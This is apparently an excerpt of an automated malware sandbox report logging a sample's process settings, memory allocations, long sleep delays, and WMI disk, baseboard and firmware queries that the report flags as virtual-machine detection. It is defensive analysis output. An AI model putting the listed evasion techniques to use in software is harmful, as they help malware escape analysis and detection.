Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

System information queried: FirmwareTableInformation

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Memory allocated: 1FA0B110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Memory allocated: 1FA24BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 226AF960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 226C92E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Memory allocated: 23C52B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Memory allocated: 23C6C5E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 1F95D580000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 1F9770B0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 1199047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 1198219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 1197297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6799	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2995	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Window / User API: threadDelayed 4641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Window / User API: threadDelayed 5102	Jump to behavior

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe TID: 5644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4796	Thread sleep count: 6799 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344	Thread sleep count: 2995 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe TID: 6164	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59733s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59621s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59389s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59274s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 3116	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59701s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59471s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59353s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -1199047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59651s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -119062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59417s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -1198219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59855s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59746s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59626s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59501s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59376s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -1197297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59420s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59876s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59753s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59628s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59503s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe TID: 940	Thread sleep time: -59378s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe TID: 2284	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
